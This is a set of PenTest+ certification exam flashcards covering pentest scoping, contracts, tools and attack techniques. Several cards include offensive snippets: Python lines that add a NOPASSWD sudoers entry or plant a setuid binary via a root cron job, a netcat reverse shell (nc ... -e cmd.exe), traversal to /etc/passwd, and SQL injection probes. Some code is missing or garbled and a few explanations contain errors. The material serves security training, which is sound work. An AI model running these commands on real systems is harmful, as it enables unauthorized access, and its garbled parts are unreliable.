TotalTester Online: CompTIA Pen Test+ Certification Exam PTO-001 Flashcards

Question 1

Q

During an internal pentest of a company’s network, you find that a substantial number of Active Directory user account passwords on the Windows domain are susceptible to brute-force login attacks, using passwords of no more than six characters in length, with little to no password complexity.
Which mitigation strategy should you recommend to the customer?
A.Don’t use passwords susceptible to dictionary attacks
B.Limit character reuse
C.Enforce a stronger password policy
D.Remove default user accounts on the system

Answer

A

C.Enforce a stronger password policy

Explanation:
The customers network in the scenario provided lacks the ability to enforce stronger password settings, which can be controlled using both a technical policy and an administrative control policy.
The administrative policy can inform users that they must use passwords that meet a certain level of complexity, and a technical policy can enforce the actions of the administrative policy using a configuration setting.

A,B, and D are incorrect.
A is telling the customer to not use passwords susceptible to dictionary attacks only highlights the weakness and is not a mitigation strategy.
B is incorrect because limiting character reuse during the password creation process may not alter the complexity of the password, thus not preventing passwords used on the domain from being susceptible to brute-force logins.

D. is incorrect because removing default user accounts on the system doesnt address the issue of weak passwords.

Question 2

Q

You are tasked with completing an internal pentest of the ABC company’s network.
To be sure you cover all the levels of trust within the company’s network, which methods of access should you conduct testing from? (Choose three)
A.Limited access
B.User-level access
C.Privileged-level access
D.Executive-level access
E.All of the above

Answer

A

A.Limited Access
B.User-level access
C.Privileged-level access

Explanation:
A,B, and C are correct.
A is correct because limited access affords the intial connectivity to the targets, such as a connection to the network (physical or wireless) where you attempt to exploit a higher level of access on the network, such as user-level or privileged user access.

B is also correct because the level of access assumes the identity of a trusted insider with basic permissions that a typical user on the network would have.

You can attempt to exploit this level of access to obtain privileged user, where you can attempt to escalate from local admin to domain admin on an Active Directory network

D & E are incorrect because executive level access is not a recognized access level and will likely faill within the other three categories of access permissions such as user-level access or privileged level access on the network.

Question 3

Q

The rules of engagement (RoE) document MUST contain a signature from which of the following? (Choose all that apply)
A.Service vendor
B.Organizational management
C.Finance Department
D.Contracts Department

Answer

A

A.Service vendor
B.Organizational management

Explanation:
A and B are correct as A is the service vendor who carries out the execution of the pentest

B. is correct because organizational management is responsible for working with the vendor to ensure they have they need to be successful, and providing direct oversight of the project

C and D are incorrect because the financial department is responsible for paying the purchase order for the work and verifying the service vendors invoice

Contracts department is involved when signing other contractual documents such as the MSA or SOW and holds the service vendor accountable for all contractual obligations

Question 4

Q

Critical findings in a pentest are likely to have  \_\_\_\_\_) on a customer network
A.a high impact
B.a low impact
C.a medium impact
D.no impact

Answer

A

A.a high impact

Explanation:
Critical findings will have a high impact on the network, based on certain environmental factors such as the sophistication of the exploit and how it affects the confidentiality, integrity and availability of the system/network

B,C and D are incorrect because low impact findings are rated with a low severity

Medium severity impact findings are rated with a medium severity

D is incorrect because there are no findings that should be categorized with a no impact level of severity

Question 5

Q

Using the following example PHP code, what type of attack could this application be suspticble to?

Example HTTP GET request:
http://www.example.com/test.php?img=photo1.png

Example PHP Code:

Answer

A

A.Directory traversal attack

Explanation:
The example URL will attempt to retrieve photo1.png from the web server and render the image in the brwoser.

The example PHP code shows that the value of the img= paramter, photo1.png, should be retrieve from $WebDir, which points to the local file system path of ‘/var/www/html’

However, because the code provides no input validation, it could be susceptible to directory traversal to access files outside the intended location using ../../../etc/passwd

B,C and D are incorrect
B is incorrect because the application would not be susceptible to a SQL injection as there is no mention of a database function within the code

C is incorrect because the PHP code does not execute directory indexing

D is incorrect because click jacking is a client side attack that tricks user into clicking on a button or link within a web page they were not intending to interact with.

This attack makes use of CSS iframes, and even text boxes to load legitimate web content through an attacker-controlled web page

Question 6

Q

The runme.py script is executed through a root cron-job everyday from the NFS share called /share.

The permissions on the script allow anyone to write to the file.

You have user-level privileges as the “user1” account on the Linux target where the cron-job is executed form.

Which of the following options could you append to the script to further exploit the target? (Choose all that apply)
A.os.system (‘chmod 4447/bin/bash’)
B.os.system(‘cp /bin/vi /share; chmod 4447/share/vi’)
C.’os.system(‘cat/etc/shadow’)
D.os.system(‘echo “user1 ALL=(ALL) NOPASSWD:ALL”&raquo_space; /etc/sudoers’)

Answer

A

B.os.system(‘cp /bin/vi /share; chmod 4447/share/vi’)
D.os.system(‘echo “user1 ALL=(ALL) NOPASSWD:ALL”&raquo_space; /etc/sudoers’)

Explanation:
B is correct because you can use a system call to copy the vi command (as root) to the NFS share and apply a setuid bit on the executable.

When the new vi command is executed you can escape the shell and execute commands as root

D is also correct because you can echo a line into the /etc/sudoers file so that your user account can execute commands as root with no password

A and C are incorrect because bash as setuid restrictions that will prevent the shell from executing with root privileges.

C is incorrect because reading the /etc/shadow file will happen inside roots cronjob process thus it will not be visible to your user account.

However, if you redirected the output of the command to a file, you would be able to read the shadow file

Question 7

Q

During a physical pentest, your team was able to duplicate a valid employees proximity card and would like to use it to gain access to the server room.
What type of attack is described in this scenario?
A.RFID Cloning
B.SPP
C.Lock bumping
D.Egress sensor bypass

Answer

A

A.RFID Cloning

Explanation:
RFID cloning (badge cloning) is the process of duplicating a valid identification card used for physical entry

B is incorrect because single pin locking (SPP) is a technique used for picking the pins in pin tumbler locks
C is incorrect because lock bumping is a technique used for brute-forcing door locks

D is incorrect because an egress sensor bypass is not used to clone identification cards, but rather accomplished by wedging a piece of paper between the top of the door and the door frame to trigger thew motion sensor to release the magnetic door lock, allowing unauthorized entry through the door

Question 8

Q

Which type of assessment is required for organizations that accept, process or store consumer payment card information?
A.PCI DSS
B.HIPAA
C.Red team
D.FISMA

Answer

A

A.PCI DSS

Explanation:
The Payment Card Industry Data Security Standard assessment is required for organizations who accept, process or store payment card information for customers and merchants

B is incorrect because HIPPA is for organizations that manage personal health information

C is incorrect because red team assessment is used to simulate advanced persistent threats (APT) on an organizaions network

D is incorrect because Federal Information Security management Act (FISMA) assessments are for organizations that use government networks and mandated under US federal regulations

Question 9

Q

Which of the following WIndows shares are readable on the local area network by default?
A.ADMIN$
B.IPC$
C.C$
D.All of the above

Answer

A

B.IPC$

Explanation:
The IPC$ share, also known as the null session share, allows anonymous hosts on the network to perform certain activities such as enumerating domain accounts and network shares

A and C are incorrect because the ADMIN$ and C$ Windows shares are only accessible over the network by local or domain administrator accounts

D is incorrect because not all of the shares are readable by anonymous users on the network

Question 10

Q

By default, what type of queries will a Windows host send over the network if it cannot resolve the hostname through DNS? (Choose all that apply)
A.LLMNR
B.NBNS
C.ARP
D.ICMP

Answer

A

A.LLMNR
B.NBNS

Explanation:
In the event that a Windows host cannot resolve the WPAD (web proxy auto-discovery protocol) server hostname through DNS, it will send Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBNS) queries over the network by default; however, this can be disabled changed

C is incorrect because ARP is used for resolving an IP to a MAC address

D is incorrect because ICMP is used for communicating with hosts over the network and sending error messages and other operational information regarding services over the network

Question 11

Q

During a pentest, you were successful with gaining remote user-level access to a Windows 10 host on the ABC Active Directory Domain.

The customer utilizes sophisticated intrusion detection capabilities.

Part of the RoE suggests utilizing attack techniques that might go undetected.

Which of the following would be the BEST choice when carrying out additional attacks from the compromised host?
A.Leverage native capabilities from the host and try to blend in with normal activity until you get a fell for how the IDS capabilities are configured
B.Copy tools such as pwdump.exe and ncat.exe over to a staging area on the local file system and start planning an attack strategy
C.Use msfvenom to generate a Meterpreter payload for the compromised target, then copy over to the local file system. and execute the payload to get a reverse, encrypted shell to use for interacting with the target
D.Establish a foothold on the target using the Empire framework, in order to further exploit Active Directory Domain

Answer

A

A.Leverage native capabilities from the host and try to blend in with normal activity until you get a fell for how the IDS capabilities are configured

Explanation:
Given the current scenario, it is unknown how sophisticated the customers defense capabilities are so gaining situational awareness is a critical step in the post-exploitation phase and can help a pentester gather important knowledge of the host and internal network

Once you know how the system and environment are configured, you can start planning your next position of attack, such as if an exploitation framework is safe to use, which exploits or attacks could trigger unnecessary alarms/alerts on the network

B is incorrect because there is not enough information provided to determine if those actions can support post-exploitation capabilities without being detected

C is incorrect because putting unnecessary executable or exploits on a local file system could trigger the antivirus software

D is incorrect because it is best to wait until you gain situational awareness of the environment and surroundings before carrying out an attack strategy without a well-thought out plan

Question 12

Q

After obtaining root access through a local privilege escalation vulnerability on a Linux server, you decided to create a cronjob to call back to your attack host with a remote shell every hour in case the system administrator reboots the server.
This technique is known as what? (Choose all that apply)
A.Maintaining persistence
B.Lateral movement
C.Pivoting
D.Creating a backdoor

Answer

A

A.Maintaining persistence
D.Creating a backdoor

Explanation:
Creating a cronjob to call back to your attack host would be considered both maintaining persistence and creating a backdoor into the customers network

B is incorrect because lateral movement would be remotely connecting to other hosts on the customers network or domain using native operating system commands, such as ssh with the same users domain credentials

C is incorrect because pivoting would be the process of utilizing a compromised target or host within your control to exploit trust relationships within the domain.

For example, establishing a foothold on the compromised target in the customer network behind an external firewall, then creating an SSH tunnel through the firewall to stage attacks against other internal network targets from the compromised target

Question 13

Q

What is this command doing?
‘nc 192.168.1.50 4444 -e cmd.exe’

A.Forward a command shell from the local Linux host to a remote host over the network
B.Forward a command shell from the local WIndows host to a remote host over the network
C.Forward a command shell from the remote host to the local Linux host over the network
D.Forward a command shell from the remote host to the local WIndows host over the network

Answer

A

B.Forward a command shell from the local WIndows host to a remote host over the network

Explanation:
The netcat (nc) utility can be used to forward data to remote hosts over the network.

The command in this example is forwarding a command shell from the local WIndows host to a remote host listening on port 4444/tcp

A is incorrect because the shell that is being forwarded is a Windows command shell (cmd.exe), which suggests the local host is Windows
These answers are incorrect because the command is connecting to the remote host IP address of 192.168.1.50

If the connection were to the local host, the loopback address of 127.0.0.1 could be used, but otherwise there is no need to connect back to the local host if the pentester already had access to the target box

Question 14

Q

Organizations looking for an evaluation that tests their defense posture against real-world attacks that involve stealth and blended methodologies and that test time to detection, time to response and resilience against specified modeled threats would be looking for which type of assessment?
A.Compliance-based
B.Goals-based
C.PCI DSS
D.Red team

Answer

A

D.Red team

Explanation:
A red team assessment or read teaming, will evaluate how well an organization would fare given a scenario of a real-world attack of skilled attackers.

Read teamining involves stealth and blended methodologies (such as social engineering and network pentesting).
The goals of red teaming are to test time detection, time to response and resilience against specifically modeled threats using tactics not limited to a single attack scope

A and C are incorrect because those types of assessments would satisfy compliance and regulatory based assessments

B is incorrect because goals-based assessments cover specific goals, or objectives, within a defined scope whereas red teaming could expand using tactics that are not limited to a single attack scope

Question 15

Q

Which testing methodology or methodologies should an organization consider when scoping and planning for an engagement? (Choose all that apply)
A.Black box
B.White box
C.Gray box
D.All the above

Answer

A

D.All the above

Explanation:
All of the answers are testing methodologies that should be considered when planning and scoping an engagement

Question 16

Q

During a pentest, you successfully recover NTLM hash values for most of the users in an Active Directoru domain; however, you are unable to execute PtH attacks due to environmental restrictions.

Therefore, you decide to use the hashcat utility to crack the hashes offline.

Which hashcat mode will you use to crack the hashes?
A. -m 2500
B. -m 300
C. -m 1000
D. -m 0

Answer

A

C. -m 1000

Explanation:
The hash mode for NTLM in hashcat is represented as 1000

A is incorrect because that hash mode is for WPA.

Answer B is incorrect because that hash mode is for LANMAN hash values

D is incorrect because that hash mode is for MD5 hash values

Question 17

Q

The following command will do what to the wireless network interface?

‘airmon-ng start wlan1’

A.Inject packets on the wireless network
B.Put WLAN1 into monitor mode
C.Enable the wireless interface card
D.None of the above

Answer

A

B.Put WLAN1 into monitor mode

Explanation:
The airmon-ng command utility is used to put the wireless interface into monitoring mode

A is incorrect because ‘aireplay-ng’ is the Aircrack-ng utility that is capability of injecting packets on the wireless network

C is incorrect because the interface card should already be enabled prior to using airmon-ng

D is incorrect because at least one answer is correct.

Question 18

Q

In certain situations, a pentester may need to download, modify and complete an exploit for the target architecture.

Which command can a pentester use to accomplish this task in a Unix-like environment?
A. adb
B.gcc
C.apk
D.gdb

Answer

A

B.gcc

Explanation:
The GNU compiler (gcc) is a utility that will compile source code written in the C programming language for the architecture the program will run on

A is incorrect because the Android debug bridge (adb) is a command utility that will allow you to connect to an Android device from a computer using a USB cable

C is incorrect because an Android application package (APK) is a file format for the packages installed on Android devices, not a compiler

D is incorrect because the GNU debugger (gdb) is the command utility to debug programs, not compile them

Question 19

Q

VNC password that rely on DES encryption can be a maximum of how many characters in length?
A.6
B. 8 
C.10
D.12

Answer

A

B. 8

Explanation:
VNC passwords that use DES encryption will be truncated to the length of eight characters, regardless of what the user sets the password to be.

This is a limitation of DES

A, C and D are incorrect because DES encryption supports up to eight character in length

Question 20

Q

\_\_\_\_\_\_ is a tactical process for surverying an area for wireless access points while in a moving vehicle
A.Stumbling
B.Scanning
C.Wardriving
D.Enumeration

Answer

A

C.Wardriving

Explanation:
Wardriving is a tactical process for surverying an area for wireless access points while in a moving vehicle in order to identify wireless networks and potential targets in certain area of interest

A is incorrect because stumbling is a surveillance technique used for discovering SSIDs, router vendor information and signal strengthen MAC addresses, channels and so on.

B is incorrect because scanning is the process of examining or studiyng the surace of an object

In regard to scanning a network, this optiuon is a little more obtrusive than wardriving

D is incorrect because enumeration is the process of extracting information from a particular target, rather than passive surveillance of a target area during reconnaissance

Question 21

Q

The following lines of code will echo a random_msg every second until var equals 10.

However, the same message is echoed each time through the loop

What could you do to help randomize the messages that are echoed in the terminal?
A.Move line 9 outside of the while loop
B.Move line 5 within the while loop
C.Move line 4 below line 11
D.Move line 3 below line 8

Answer

A

C.Move line 4 below line 11

Explanation:
A seed value is a number used to intialize a pseudorandom number generator.

The Bash Script requires a condition that generates a random seed value (line 5) to be placed within the while loop to help randomize the message that is echoed to the terminal when the script is executed.

When the condition is not in the loop, the script will echo the same message until the value of $var equals 10

A is incorrect because moving line

Question 22

Q

During the internal portion of a pentest, you notice an executable called newcmd.exe in the C:\Windows\Temp folder on one of your targets.

The executable is also in the process listening, running with SYTSTEM privileges and consuming a great deal of hardware resources on the host.

You consult with your team, and no one else has touched this target.

What is the best course of actions for this scenario?
A.Inform the customer immediately of the potential compromise
B.Include the incident in the pentest report, but dont bother the customer at this time
C.Conduct malware analysis against the executable
D.Remove the executable and inform the customer

Answer

A

A.Inform the customer immediately of the potential compromise

Explanation:
Given a scenario that may require deconfliction your pentest team may need to sort out the pentest artifacts from the artifacts of a real compromise

Question 23

Q

JTAG can be used for which of the following?
A.Application debugging
B.Debugging embedded devices
C.Jailbreaking
D.Rooting Android devices

Answer

A

B.Debugging embedded devices

Explanation:
JTAG is used for debugging embedded devices (hardware)

Question 24

Q

In regard to a pentest report, what is a testing narrative?
A.It offers details as to the testing methodology that was executed and the outcome
B.It provides details for each tool used to conduct the testing
C.It shows how successful the pentest team was in conducting the assessment
D.Its required for PCI, HIPAA, and FedRAMPS pentests

Answer

A

A.It offers details as to the testing methodology that was executed and the outcome

Question 25

Q

During a pentest, your team is having issues running a root setuid program on an NFS file system in a directory named /share

The permissions on the executable are 4777

What is the likely cause of the problem?
A.The program is missing the executable flag
B.The NFS share is mounted with the nosuid option
C.The setuid flag is missing on the program
D.Your team is not executing the program using the full path

Answer

A

B.The NFS share is mounted with the nosuid option

Explanation:
An NFS file share configured to mount with the nosuid option will prevent executable s on the share from executing with the privileges of the program owner.
This is a security feature to defend against using NFS to facilitate privileged escalation attacks on the local OS

Question 26

Q

The SOW includes information pertaining to all Except which of the following subjects?
A.Location of work
B.Period of performance
C.Allocation of risk
D.Scope of work

Answer

A

C.Allocation of risk

Explanation
The allocation of risk is a provision within the master service agreement (MSA) that defines levels of responsibility between each party

Question 27

Q

Your team is attempting to crack an MD5 password hash using a dictionary-based attack, thus far without success.
Your team knows the length and complexity of the password based on the targets password policy.
Which technique might give your team a better chance at cracking the password?
A.Using rules
B.Brute force
C.Password guessing
D.Hash-identifier

Answer

A

A.Using rules

Explanation:
A predetermined set of rules to make certain letters uppercase, lowercase and so forth can help improve the efficiency of the attack when the length of the password is known and can help the team work smarter instead of harder

Question 28

Q

Which contractual document is signed by two consenting parties to protect each others competitive advantages?
A.RoE
B.SoW
C.NDA
D.MSA

Answer

A

C.NDA

Explanation:
A nondiclosure agreement is a confidentiality agreement that protects a business’s competitive advantage by protecting its proprietary information and intellectual property.

THis document is fully executed by both parties (signed into action) prior to working together

Question 29

Q

In the context of a pentest report, a finding is a weakness that could be advantageous to an attacker and, when documented in the report, includes actionable items from exploitation and post-exploitation activities.

Which of the following would be considered findings that should be included in the pentest report?
A.A SQL Injection vulnerability provided the pentest team direct access to the production database server
B.The pentest team conducted MiTM exploitation against assets operating on the LAN
C.The pentest team successfully bypassed the physical locking mechanism of the cipher lock using a known bypass to gain access to the organizations telecommunications closet
D.The vulnerability scanner found that the version of SSL being used does not meet industry best practices.,
However, this vulnerability was not found when the scan was executed from inside the trusted network

Answer

A

A.A SQL Injection vulnerability provided the pentest team direct access to the production database server

C.The pentest team successfully bypassed the physical locking mechanism of the cipher lock using a known bypass to gain access to the organizations telecommunications closet

Explanation:
They describe the exploitation of a vulnerability and provide supporting written evidence of a finding

B is incorrect because conducting MiTM testing does not constitute a finding; rather test a testing activity that can be added to the testing narrative to describe internal testing on the LAN

Question 30

Q

A long running, persistent mechanism that can run as  a background process on a target Linux server is known as what?
A.Script
B.Executable
C.Cronjob
D.Daemon

Answer

A

D.Daemon

Explanation:
A daemon is a long running program that is typically started at boot or when an application launched from a terminal window and runs as a background process rather than under the direct control of an interactive user

A is incorrect because a script is not considered a long-running, persistent program as it executes under the control of an interactive user or process, such as a cronjob, but terminates after is completes it associated tasks

B is incorrect because an executable is a program by itself unless it is started by a user or a process

C is incorrect because a cronjob is not long running, it will execute and terminate within a certain period of time

Question 31

Q

The unquoted service path vulnerability can be used to escalate privileges on a Windows target and exploits what function of the OS?
A.CreateProcess
B.Task Scheduler
C.Weak Access Controls
D.Windows Registry

Answer

A

A.CreateProcess

Explanation:
Unquoted service paths are a direct result of the CreateProcess function in Windows operating systems, where the name of a directory or program in the search path is truncated when the function identifies a blank space in the path.

Windows will attempt to load each truncated executable until it finds the correct one

B is incorrect because the Task Scheduler is a Windows component used for managing the execution of Windows scheduled tasks.

C is incorrect because weak access controls is a misconfiguration of the operating system, not a function

D is incorrect because the Windows registry is a collection of databases of Windows configuration settings, not a function of the OS

Question 32

Q

The WHOIS directory service was developed in the 1980s to query what type of information?
A.IP information
B.Host information
C.Domain registration information
D.User information

Answer

A

C.Domain registration information

Explanation:
The WHOIS directory service was developed to look up domain registration information from registry databases adminstered by multiple registries and registrars around the world

A and B are incorrect because that information is typically searched and obtained during Domain Name System (DNS) queries

D is incorrect because suer information obtained from the WHOIS lookup however, registrar contact information might be able to be searched if the registration of the domain is not private

Question 33

Q

The Android operating system relies on which type of database to store data in the form of a flat file on the end users mobile device?
A.mongoDB
B.MySQL
C.SQLite
D.PostgreSQL

Answer

A

C.SQLite

Explanation:
The SQLite database is used by Android to store data on the end users mobile device

A, B and D are incorrect as these database types are typically found in non-mobile, Unix like and Windows environments

Question 34

Q

During a pentest your customer asks you to review a log entry from a target web server, as the malicious traffic appears to originate from one of your teams authorized IPv4 addresses.
The log file shows the following:

‘GET /info.php?id=1%20AND%201=1 HTTP/1.1 200

What is your team member most likely testing for?
A.Command injection
B.XSS
C.SQL Injection
D.CSRF

Answer

A

C.SQL Injection

Explanation:
The AND operator is passed in the URL to generate a true statement to see if the application is vulnerable to a SQL Injection attack.

URL encoding (%20) is used for white spaces in the URL request

A is incorrect because the request was not using a command such as cat, ls, id, etc. as the value parameter is used to reference a record in the database

B is incorrect because the log entry does not have any JavaScript code in the parameter, which is a characteristic of a cross-site scripting (XSS) attack.

D is incorrect because there was no attempt to exploit a cross-site request forgery (CSRF) in the web request

Question 35

Q

Prior to the pentest, the customer provides your team with support resources and artifacts in order for your team to assist with the validation testing during an internal assessment.

Among these artifacts is the SOAP project file.

Which of the following best describes the purpose of the artifact?
A.Provides a machine-readable XML description of HTTP-based web services
B.Elaborates on the framework used to develop the software application
C.Describes the format for receiving and sending messages
D.Formally describes the elements comprising an XML document

Answer

A

C.Describes the format for receiving and sending messages

Explanation:
The Simple Object Access Protocol (SOAP) project file describes the format for receiving and sending messages between web-based services

A is incorrect because a machine readable XML description of HTTP-based web services is found in the Web Services Description Language (WSDL)

B is incorrect because the software development kit (SDK) documentation elaborates on the framework used to develop the software application

D is incorrect because the Extensible Markup Language (XML) scheme definition (XSD) is used to formally describe the elements comprising an XML document

Question 36

Q

What does the following script do?
A.Copies log files to another directory and then removes all the logs
B.Moves log files to another directory and then secure copies the files to another host using a password
C.Moves log files to another directory, then secure copies the files to another host using scp, and then removes the files that were secure copied
D./Secure copies the files and them removes the files from the remote host

Answer

A

C.Moves log files to another directory, then secure copies the files to another host using scp, and then removes the files that were secure copied

Explanation:
The bash script counts the number of files in the $log_dir directory, and then uses a conditional statement to verify that there are indded files in that directory.
If there are files in the $log_dir directory, then the script proceeds to move the files to the $dst_dir directory, then secure copies the lof files from $dst_dir after they have been secured copied

A, B and D are incorrect

A is incorrect because the script does not remove all the logs once it copies them to another directory

B is incorrect because the secure copy is done with an SSH key, not a password

D is incorrect because the script does not remove the file from the remote host

Question 37

Q

Mechanical locks such as a pin tumbler lock can be defeated using which of the following techniques?
A.SPP
B.Raking
C.Jiggling
D.All of the above

Answer

A

D.All of the above

Explanation:
Single pin picking (SPP), raking, and jiggling are all locking skills that can be used to defeat the security mechanism in mechanical locks such as a pin tumbler lock

Question 38

Q

The customer is using SSH for remote logins and transferring files to hosts on the local area network.

however, you also found FTP and Telnet open on most of the Unix servers in the customer environment.

The system admin says they dont use those legacy programs any longer

How would you document this in a pentest report, even though you did not exploit these services?
A.Record this as a critical finding
B.Include as an “unnecessary open services” observation in the executive summary
C.Do not address this in the report, since the services are on the LAN and are not exposed to external attacks
D.Ask for additional time to test the services

Answer

A

B.Include as an “unnecessary open services” observation in the executive summary

Explanation:
Testing observations, such as the use of unecessary open services, can be addressed in the executive summary section of the pentest report.

This can help management know there may be inconsistent practices used for admin of the network, or lack of configuration management guidance.

These types of cultural issues can be remediated with the help of a top-down management approach for senior leadership to set the vision and delegate subordinates to carry out the new organizational goals

A is incorrect because the observation is not a finding, as the lgacy services were not to be exploited

C is incorrect because documenting in the pentest report any noteworthy observations, and ones that might point out a bigger picture of a problem should be done for senior leadership so they can be addressed and prioritized accordingly.

In the case of unnecessary services, if you find that most of the hosts on the network have not been patched in over a year and they are running legacy services, this is evidence that the customer is failing to practice industry best practices on the network in more places than one, which could be a cultural issue (lack of knowledge, expertise, or motivation) or a resource issue

Question 39

Q

Which of the following is a valid reason for executing an authenticated vulnerability scan against a target?
A.It produces more findings
B.You will be able to show more impact in your test results
C.It helps to reduce false positives
D.The scan will help exploit target weaknesses and carry out post-exploitation activities

Answer

A

C.It helps to reduce false positives

Explanation:
Executing an authenticated vulnerability scan can help reduce the number of false positives reported by a vulnerability scanner, as the credential used during the scan will have the ability to verify a patch or configuration setting, wheras an unauthenticated scan will go off a service banner or trivial fuzzing technique that may or may not be enough to guess at the existence of a vulnerability

Question 40

Q

Which type of confidential document covers items such as social responsibility, business ethics, network and facility access and so forth?
A.MSA
B.SOW
C.RoE
D.NDA

Answer

A

A.MSA

The master service agreement is a type of overarching contract between two or more parties where each party agrees to most terms that will govern all other future transactions such as payment terms, dispute resolution, social responsibility, business ethics, network and facility access

Question 41

Q

Which type of attack will help speed up the cracking process for a WEP key by injecting arbitrary packets into the wireless access point, but does not actually crack the key?
A.Deauthentication attack
B.Initializing vector
C.Karma Attack
D.Fragmentation attack

Answer

A

D.Fragmentation attack

Explanation:
A fragmentation attack is very similar to the ChopChop attack.

This type of attack will speed up the cracking process for a Wired Equivalent Privacy (WEP) key by injecting arbitrary packets into the wireless access point but does not actually crack the key.

The fragmentation attack exploits the pseudorandom generation algorithm (PRGA) sequence in RC3, where after 4096 packets, two will likely share the same initialization vector (IV) and thus the same RC4 key

Question 42

Q

The following code was used to exploit a target web server during a pentest.

What type of attack did this exploit take advantage of?

]>

&xxe;>/user>
mypass

A.PAth traversal attack
B.RFI
C.XXE Injection
D.LFI

Answer

A

C.XXE Injection

Explanation:
The XML code takes advantage of the Expect () module to execute commands (XXE injection) against the web server

A is incorrect because the XML code does not traverse throughout eh local file system or web root of the web server

B is incorrect because the XML code is not reaching out to a malicious web page or application to execute remote code

D is incorrect because the XML code is not including files; its executing system commands

Question 43

Q

Which fully executed document provides authorization from an organization to conduct a pentest and will include or elaborate on subjects defined in the SOW?
A.NDA
B.MSA
C.Contractual agreement
D.RoE

Answer

A

D.RoE

Explanation:
The Rules of Engagement document puts into writing the guidelines and constraints regarding the execution of a pentest and typically elaborates on subjects in the SOW, such as the testing method, target selection etc

Once the RoE is signed by an authorizing official within the organization and all other respective parties, the fully executed (FE) document provides the pentest team with authorization to carry out the agreed upon terms and conditions

Question 44

Q

When executing a UDP port scan against a customer network, you want to start out by scanning only those ports that are known to have UDP services present.

Which of the following options can you use to scan for SNMP, NTP, NetBIOS, and DNS?
A.nmap -vv -sUV -p 53, 123, 137-139, 161 123 192.168.1.0/24 -oA udp scan
B.nmap -vv -sUV -p 53-161 192.168.1.0/24 -oA udpscan
C.nmap -vv -sUV -p 53,123,137-139,161 192.168.1.0/24 -oA udpscan
D.nmap -vv -sUV -p 53-123, 137, 139, 161 192.168.1.0/24 -oA udpscan

Answer

A

C.nmap -vv -sUV -p 53,123,137-139,161 192.168.1.0/24 -oA udpscan

Explanation:
The -p port flag is used to specify the particular port or port range to use for the scan.

Each port must either be specified on a range or comman delineated with no spaces 
SNMP - 161
NTP - 123
NetBIOS 137-139
DNS - 53

Question 45

Q

Which command can be used to help analyze the contents of a binary file? (Select all that apply)
A.strings
B.cat
C.echo
D.binwalk

Answer

A

A.strings
D.binwalk

Explanation:
A is correct because the strings command is a useful utility in Linux to print the strings of printable character sin files (that is, ASCII characters) that are at least four characters in length

D is correct because the binwalk command is a fast and easy-to-use tool for analyzing and reverse engineering executables and firmware images, such as those loaded on embedded systems such as Wi-Fi routers, IoT and so on

Question 46

Q

During an ICMP discovery scan on the customers LAN, you find that the target hosts are not responding, which could be due to the local Windows firewall settings on the hosts.

Which of the following nmap command options could you use to aid in the discovery of hosts on the LAN? (Select all that apply)
A.-Pn
B.-sS
C.-sU
D.-sL
E.All of the above

Answer

A

A.-Pn
B.-sS
C.-sU

Explanation:
The -Pn option disables the host discovery option within Nmap and treats all hosts as alive, -sS will conduct a port scan against TCP ports, and -sU will conduct a port scan against UDP ports

D is incorrect because the -sL option is used to list targets to scan, based on what is supplied in the input

Question 47

Q

You have been tasked with developing the rules of engagement (RoE) document for an upcoming pentest for company ABC, which has target assetgs hosted in Azure and AWS.

What kind of information might you want to include in the RoE? (Choose all that apply)
A.Target IP addresses
B.Cloud service provider approvals
C.Payment terms and conditions
D.Testing Schedule
E.Brute-force tactics and potential side effects
F.All of the above

Answer

A

A.Target IP addresses
B.Cloud service provider approvals
D.Testing Schedule
E.Brute-force tactics and potential side effects

Explanation:
A is correct because target selection (IP addresses) is captured within the RoE

B is correct because Cloud Service Provider approvals may be required so they know the pentest is occurring and can plan accordingly

D is correct because the testing schedule defines the timeline for when the engagement will take place

E is correct because the RoE defines tools, techniques and methodology that the customer will need to approve prior to starting the pentest

Question 48

Q

UDP is a connectionless protocol.

Which of the following options use this protocol for communication?
A.DNS
B.SSH
C.NetBIOS
D.TFTP

Answer

A

A.DNS
C.NetBIOS
D.TFTP

Explanation:
DNS (53/udp), NetBIOS(137/udp,139/udp) and TFTP (69/udp) all rely on the connection le`ss protocol

Question 49

Q

What defines the requirements and objectives for a pentest?
A.Scope
B.Executive summary
C.Rules of engagement
D.Nondisclosure agreement

Answer

A

A.Scope

Explanation:
The scope outlines the objectives and requirements for the assessment.

During the scoping phase, you attempt to address the testing requirements, target selection, scheduling and timelines and strategy for testing

Question 50

Q

Mitigation strategies could be provided for which of the following categories?
A.People
B.Technology
C.Processes
D.All of the above

Answer

A

D.All of the above

Explanation:
People, technology, and processes could be the cause of a vulnerability within the organization or the network.

However, these elements can also carry, identify or implement the solution to help remediate the problem

Question 51

Q

Which of the following options is an example of Boolean-based SQL injection? (select all that apply)
A.www,example.com/info.php?id=1 AND 1=1
B.www.example.com/info.php?id2;2–
C.www.example.com/info.php?id=2 AND 3=4
D.www.example.com/info.php?id=1;UNION SELECT * from mysql users;–

Answer

A

A.www,example.com/info.php?id=1 AND 1=1
C.www.example.com/info.php?id=2 AND 3=4

Explanation
Boolean based SQL injection is where you ask the database true or false questions to determine the answer based on the response given by the application, where the response could be a content error or a blank page

Question 52

Q

During a pentest, you discover users and admins are following poor password-generation practices on the domain, such that passwords are either guessable or subject to dictionary attacks.

Which of the following BEST describes the appropriate remediation guidance for the customer?
A.Incorporate a stronger password complexity policy on the domain
B.Provide training to improve oversight of and compliance with organizational password policy requirements
C.Move to using 2FA or RADIUS to reduce the risk of passwords getting compromised
D.Change passwords for all users and admins after enforcing a new password complexity requirement on the domain

Answer

A

D.Change passwords for all users and admins after enforcing a new password complexity requirement on the domain

Explanation:
Recommending that a new password complexity requirement be enforced on the domain is essential, as most of the passwords for both admin and user accounts were susceptible to dictionary-based attacks

Then, having all of the users and admins change their passwords after password complexity has been enforced on the domain will help ensure passwords adhere to the new organizational requirement

A is incorrect because incorporating stronger password policy on the domain is only part of the solution.

Users and admins need to change their passwords so the new policy can take effect.

B is incorrect because providing training to improve oversight and compliance or organizational password policy requirements is good, but it doesnt help enforce a technical control to resolve passwords susceptible to dictionary-based attacks

C is incorrect because it introduces a solution where the gains do not balance the complexity of implementation for all domain accounts

Question 53

Q

During a pentest, you identify a wireless access point that is configured to use WPA2 PSK as well as WPS.

Why would you want to use a tool like Reaver to attack WPS instead of attempting to capture the four-way handshake from a wireless client using the Aircrack-ng utilities and then crack the PSK offline?

A.If you can recover the WPS PIN, the router will give you the plaintext value of the PSK. If the PSK is a strong password, it may take a while to crack offline
B.Reaver attacks a WPS implementation weakness in the registrar, however, the PSK can be recovered if Reaver can recover the four way handshake
C.Reaver can be used to attack weaknesses in WPS and capable of recovering the PSK through offline attacks
